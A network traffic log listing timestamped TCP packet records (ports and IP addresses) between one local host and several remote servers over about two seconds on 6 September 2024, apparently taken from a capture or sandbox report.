Sep 6, 2024 09:58:20.955533028 CEST	443	49759	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.955734015 CEST	49759	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.955744028 CEST	443	49759	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.955898046 CEST	443	49760	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.956206083 CEST	443	49759	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.956558943 CEST	49759	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.956619978 CEST	443	49759	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.956845045 CEST	49760	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.956907988 CEST	443	49760	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.962522984 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:20.962563992 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:20.962785006 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:20.962948084 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:20.962964058 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.085027933 CEST	49759	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:21.164509058 CEST	443	49760	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:21.164587975 CEST	49760	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:21.413078070 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.413634062 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.413657904 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.414033890 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.414047956 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.414081097 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.414092064 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.414113998 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.414132118 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.414793015 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.437437057 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.437542915 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.439275980 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.439289093 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.443905115 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.458879948 CEST	80	49761	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:21.458954096 CEST	49761	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:21.486037970 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.486123085 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.538074017 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.538130999 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.538160086 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.538202047 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.538207054 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.538228035 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.538248062 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.538777113 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.538817883 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.538820982 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.538829088 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.538876057 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.538876057 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.538886070 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.538958073 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.539364100 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.539436102 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.539489985 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.539499044 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.539977074 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.540028095 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.540035963 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.544450998 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.544764996 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.544776917 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.569636106 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.569650888 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.570255041 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.570322037 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.571005106 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.571067095 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.594347954 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.620079994 CEST	49764	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:21.620135069 CEST	443	49764	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:21.620498896 CEST	49764	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:21.621620893 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.621814013 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.622320890 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.622344971 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.622442007 CEST	49764	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:21.622457981 CEST	443	49764	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:21.628493071 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.628575087 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.628618956 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.628681898 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.628695011 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.628732920 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.631092072 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.631227970 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.631267071 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.631268024 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.631278992 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.631320000 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.631325960 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.631674051 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.631721020 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.631755114 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.631758928 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.631766081 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.631788969 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.632169008 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.632208109 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.632246971 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.632251978 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.632261992 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.632285118 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.632333994 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.632371902 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.632378101 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.633177042 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.633203983 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.633232117 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.633234978 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.633245945 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.633277893 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.633295059 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.633327961 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.633945942 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.634011984 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.634015083 CEST	49761	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:21.634052038 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.634085894 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.634092093 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.634100914 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.634125948 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.634778976 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.634819984 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.634836912 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.634845018 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.634886980 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.634891987 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.638860941 CEST	80	49761	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:21.683598042 CEST	49765	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:21.683648109 CEST	443	49765	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:21.683710098 CEST	49765	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:21.683806896 CEST	49766	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:21.683815002 CEST	443	49766	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:21.683856010 CEST	49766	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:21.684071064 CEST	49765	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:21.684092999 CEST	443	49765	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:21.684727907 CEST	49766	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:21.684741974 CEST	443	49766	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:21.719028950 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.719079971 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.719125986 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.719129086 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.719140053 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.719161987 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.719418049 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.719482899 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.719491005 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.719538927 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.719821930 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.719827890 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.721901894 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.721945047 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.721987963 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.721998930 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.722033978 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.722038984 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.722086906 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.722131014 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.722162008 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.722167015 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.722207069 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.722212076 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.722258091 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.722295046 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.722300053 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.722351074 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.722385883 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.722419977 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.722424984 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.722453117 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.722456932 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.722506046 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.722543955 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.722548962 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.723157883 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.723197937 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.723205090 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.723257065 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.723294973 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.723299980 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.723305941 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.723340034 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.723344088 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.723408937 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.723535061 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.723540068 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.724126101 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.724185944 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.724191904 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.724226952 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.724282026 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.724282026 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.724291086 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.724324942 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.724330902 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.724385977 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.724431038 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.724436998 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.724994898 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.725049973 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.725074053 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.725081921 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.725111961 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.725116968 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.725212097 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.725250959 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.725255013 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.725303888 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.725511074 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.725517035 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.725913048 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.725955009 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.725960970 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.726054907 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.726092100 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.746504068 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.746504068 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:21.746531963 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:21.762428999 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.762480974 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.762522936 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.762538910 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.762559891 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.762572050 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.762581110 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.762608051 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.762609959 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.762650013 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.762650967 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.762659073 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.762696981 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.762700081 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.762717962 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.762733936 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.762778997 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.762785912 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.762795925 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.762821913 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.855895042 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.855972052 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.855983019 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856002092 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856045008 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856060982 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.856076956 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856090069 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856111050 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.856120110 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856143951 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856158972 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.856168985 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856214046 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.856231928 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856277943 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856282949 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.856292009 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856340885 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856374979 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.856385946 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856421947 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.856430054 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856467009 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856589079 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.856597900 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856627941 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.856837034 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.858117104 CEST	80	49761	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:21.858164072 CEST	49763	443	192.168.2.7	142.250.64.78
Sep 6, 2024 09:58:21.858175039 CEST	49761	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:21.858189106 CEST	443	49763	142.250.64.78	192.168.2.7
Sep 6, 2024 09:58:21.987071037 CEST	49767	443	192.168.2.7	152.195.19.97
Sep 6, 2024 09:58:21.987119913 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:21.987194061 CEST	49767	443	192.168.2.7	152.195.19.97
Sep 6, 2024 09:58:21.987369061 CEST	49767	443	192.168.2.7	152.195.19.97
Sep 6, 2024 09:58:21.987385988 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:22.155122995 CEST	443	49765	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.169682026 CEST	443	49766	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.220640898 CEST	49765	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.220657110 CEST	443	49765	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.220742941 CEST	49766	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.220751047 CEST	443	49766	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.221220970 CEST	443	49765	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.221234083 CEST	443	49765	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.221283913 CEST	49765	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.221486092 CEST	443	49766	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.221534967 CEST	49766	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.221961975 CEST	443	49765	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.222002983 CEST	49765	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.222302914 CEST	443	49766	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.222342968 CEST	49766	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.229789972 CEST	49765	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.229882956 CEST	49766	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.229912996 CEST	443	49765	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.229988098 CEST	443	49766	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.231271029 CEST	49765	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.231281042 CEST	443	49765	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.231543064 CEST	49766	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.231550932 CEST	443	49766	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.267956972 CEST	443	49764	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:22.268040895 CEST	49764	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:22.340953112 CEST	49766	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.342858076 CEST	443	49765	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.342930079 CEST	49765	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.344540119 CEST	49765	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.344562054 CEST	443	49765	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.345041037 CEST	443	49766	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.345144033 CEST	443	49766	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.345199108 CEST	49766	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.346826077 CEST	49766	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.346837044 CEST	443	49766	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.355549097 CEST	49764	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:22.355562925 CEST	443	49764	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:22.355860949 CEST	443	49764	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:22.364660978 CEST	49761	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:22.365005970 CEST	49768	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:22.369853973 CEST	80	49761	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:22.369932890 CEST	49761	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:22.370170116 CEST	80	49768	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:22.370258093 CEST	49768	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:22.404973984 CEST	49768	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:22.409898996 CEST	80	49768	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:22.449620962 CEST	49769	443	192.168.2.7	142.250.80.68
Sep 6, 2024 09:58:22.449664116 CEST	443	49769	142.250.80.68	192.168.2.7
Sep 6, 2024 09:58:22.449835062 CEST	49769	443	192.168.2.7	142.250.80.68
Sep 6, 2024 09:58:22.449995995 CEST	49769	443	192.168.2.7	142.250.80.68
Sep 6, 2024 09:58:22.450012922 CEST	443	49769	142.250.80.68	192.168.2.7
Sep 6, 2024 09:58:22.479495049 CEST	49764	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:22.520504951 CEST	443	49764	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:22.575869083 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:22.576489925 CEST	49767	443	192.168.2.7	152.195.19.97
Sep 6, 2024 09:58:22.576519012 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:22.577666998 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:22.577724934 CEST	49767	443	192.168.2.7	152.195.19.97
